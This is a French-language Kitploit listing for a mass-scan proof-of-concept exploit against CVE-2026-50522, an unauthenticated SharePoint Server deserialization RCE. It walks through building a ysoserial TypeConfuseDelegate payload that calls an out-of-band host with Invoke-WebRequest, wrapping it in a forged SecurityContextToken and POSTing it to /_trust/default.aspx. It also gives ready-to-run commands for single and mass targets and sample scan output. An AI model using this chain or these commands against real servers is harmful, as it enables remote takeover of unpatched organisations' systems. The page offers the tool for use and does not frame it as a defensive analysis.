Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-50522 — Preuve de concept CVE-2026-50522 | Kitploit
Outils/GitHubGitHub/4minx/cve-2026-50522
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionRed Teaming
GitHub4minx/cve-2026-50522

CVE-2026-50522

Preuve de concept CVE-2026-50522

Voir le dépôt
38172il y a 25 joursVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-50522 Poc : RCE par désérialisation SharePoint

Exécution de code à distance non authentifiée sur SharePoint Server via la désérialisation du cookie SecurityContextToken

Exploit de scan de masse pour CVE-2026-50522 ciblant Microsoft SharePoint Server sur site. Il exploite la désérialisation non sécurisée de BinaryFormatter dans le point de terminaison WS-Federation /_trust/default.aspx pour parvenir à une exécution de code non authentifiée via des cookies SecurityContextToken forgés.

Remarque: Ce projet inclut ysoserial, un outil de test d'intrusion connu. Votre antivirus peut donc le signaler ou le mettre en quarantaine lors du téléchargement.


Informations sur la vulnérabilité

  • CVE: CVE-2026-50522
  • Type: CWE-502 Désérialisation de données non fiables
  • CVSS 3.1: 9.8 (Critique)
  • Authentification: Non authentifiée
  • Produits concernés:
    • Microsoft SharePoint Server Subscription Edition (avant 16.0.19725.20434)
    • Microsoft SharePoint Server 2019 (avant 16.0.10417.20175)
    • Microsoft SharePoint Enterprise Server 2016 (avant 16.0.5561.1001)

Comment ça marche

  1. ysoserial.exe génère un payload sérialisé par BinaryFormatter à l'aide du gadget
Télécharger l’outil
TypeConfuseDelegate
  • Le payload exécute Invoke-WebRequest vers une URL de callback hors bande
  • Les octets bruts sont déflatés (zlib) puis encodés en Base64 pour former une valeur de cookie
  • Le cookie est encapsulé dans une structure XML SecurityContextToken
  • Le jeton est intégré dans une RequestSecurityTokenResponse (WS-Federation)
  • Le paramètre wresult est envoyé en POST à /_trust/default.aspx
  • SharePoint désérialise le jeton, déclenchant l'exécution de code dans le processus de travail IIS

  • Prérequis

    • Python 3.10+ avec la bibliothèque requests
    • ysoserial.net (téléchargement)
    • Serveur de callback OOB (Burp Collaborator, interactsh, OAST)

    Utilisation

    Cible unique

    root@kitploit:~
    python CVE-2026-50522.py -t http://10.10.10.5 -c http://YOUR_ID.oastify.com
    

    Scan de masse

    root@kitploit:~
    python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com
    

    Chemin personnalisé vers ysoserial

    root@kitploit:~
    python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com --ysoserial C:\tools\ysoserial.exe
    

    Avec proxy

    root@kitploit:~
    python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com -x http://127.0.0.1:8080
    

    Mode callback par sous-domaine

    root@kitploit:~
    python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com --callback-mode subdomain
    

    Options

    ArgumentDescriptionDéfaut
    -t, --targetURL d'une cible unique-
    -T, --targetsFichier contenant les URL cibles, une par ligne-
    -c, --callback-urlURL de base du callback OOB (obligatoire)-
    --callback-modepath ou subdomainpath
    --ysoserialChemin vers ysoserial.exeysoserial.exe
    -x, --proxyProxy HTTPaucun

    Modes de callback

    Mode chemin (par défaut):

    root@kitploit:~
    http://YOUR_ID.oastify.com/10.10.10.5
    

    Mode sous-domaine:

    root@kitploit:~
    http://10.10.10.5.YOUR_ID.oastify.com
    

    Exemple de sortie

    root@kitploit:~
    [*] 50 target(s) | callback: http://abc123.oastify.com (path) | ysoserial: ysoserial.exe
    [10.10.10.5] [+] 200 [LOGIN_PAGE,AUTH_COOKIE]
    [10.10.10.6] [!] 200 [AMSI_BLOCKED]
    [10.10.10.7] [!] TIMEOUT
    [10.10.10.8] [!] SSL_ERR
    [10.10.10.9] [!] 403 [HTTP_403]
    
    [*] 45.2s | 50 total | 12 potential | 3 amsi | 5 failed
    

    Références

    • Microsoft - CVE-2026-50522
    • SOCRadar - CVE-2026-50522 PoC Fuels SharePoint Attacks
    • thehackernews - Critical SharePoint RCE CVE-2026-50522 Under Active Exploitation After Public PoC